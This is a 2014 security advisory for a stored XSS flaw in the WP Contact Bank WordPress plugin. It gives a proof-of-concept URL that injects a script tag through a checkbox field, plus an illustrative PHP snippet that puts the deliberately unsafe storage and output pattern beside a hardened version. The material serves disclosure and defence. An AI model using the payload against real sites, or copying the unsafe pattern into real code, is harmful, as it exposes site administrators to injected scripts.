05-11-2014 / Vulnerabilities

WP Contact Bank Standard Edition 2.0.69 XSS

Data submitted through checkbox fields is neither validated nor escaped before it is written to the database (_contact_bankfrontend-class.php, lines 102-123).

If a form contains at least one checkbox field, an unauthenticated visitor can submit a script payload through it. The payload is stored as-is and rendered to the administrator when the submissions are viewed at wp-admin/admin.php?page=frontend_data (stored XSS).

Proof of Concept

The following assumes that the form has ID 1 and contains one checkbox field named 11111_chk.

http://wordpress-instalation/wp-admin/admin-ajax.php?action=frontend_contact_form_library&param=frontend_submit_controls&form_id=1&11111_chk[]=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E
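The request above reaches the plugin's checkbox handler with 11111_chk[] set to an array containing the script tag. The snippet below is an added illustration, not the plugin's own code: it shows the unsafe pattern the advisory describes (checkbox values stored verbatim and echoed unescaped on the admin page) beside a hardened version. The table name, the contact_bank_submissions column names and the $field_options array are assumptions made for the example; the WordPress helpers wp_unslash, sanitize_text_field, esc_html and $wpdb->insert are real core functions.

```php
<?php
// Illustrative example added to this advisory; not code from WP Contact Bank.
// Table and column names, and the shape of $field_options, are assumptions.

// --- Unsafe pattern (the behaviour described in the advisory) ---------------

function store_checkbox_values_unsafe( $field_name ) {
    global $wpdb;
    // 11111_chk[]=<script>...</script> arrives here as an array of raw strings.
    $values = isset( $_REQUEST[ $field_name ] ) ? (array) $_REQUEST[ $field_name ] : array();

    // Stored verbatim. Nothing here stops markup from reaching the database.
    $wpdb->insert(
        $wpdb->prefix . 'contact_bank_submissions',
        array( 'field' => $field_name, 'value' => implode( ',', $values ) ),
        array( '%s', '%s' )
    );
}

function render_value_unsafe( $value ) {
    // Raw output into the admin page: the stored payload executes in the
    // administrator's browser.
    echo '<td>' . $value . '</td>';
}

// --- Hardened version --------------------------------------------------------

// $field_options: the option labels the form builder configured for this
// checkbox (assumed structure for the example), e.g. array( 'Yes', 'No' ).
function store_checkbox_values_safe( $field_name, array $field_options ) {
    global $wpdb;
    $raw   = isset( $_REQUEST[ $field_name ] ) ? (array) wp_unslash( $_REQUEST[ $field_name ] ) : array();
    $clean = array();

    foreach ( $raw as $v ) {
        if ( ! is_string( $v ) ) {
            continue; // nested arrays are never a valid checkbox value
        }
        $v = sanitize_text_field( $v );
        // A checkbox can only legitimately send one of its configured options;
        // anything else, including the script tag from the PoC, is dropped.
        if ( in_array( $v, $field_options, true ) ) {
            $clean[] = $v;
        }
    }

    if ( empty( $clean ) ) {
        return false;
    }

    return $wpdb->insert(
        $wpdb->prefix . 'contact_bank_submissions',
        array( 'field' => $field_name, 'value' => implode( ',', $clean ) ),
        array( '%s', '%s' )
    );
}

function render_value_safe( $value ) {
    // Escape at output time regardless of what the database holds, so rows
    // stored by a vulnerable version are neutralised as well.
    echo '<td>' . esc_html( $value ) . '</td>';
}
```

Both halves of the fix matter: whitelisting against the configured options stops new payloads from being stored, and escaping with esc_html at output protects the admin page from anything already sitting in the database, which an upgrade alone does not remove.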

Timeline

  • 14-10-2014: Discovered
  • 14-10-2014: Vendor notified
  • 14-10-2014: Version 2.0.70 released, issue resolved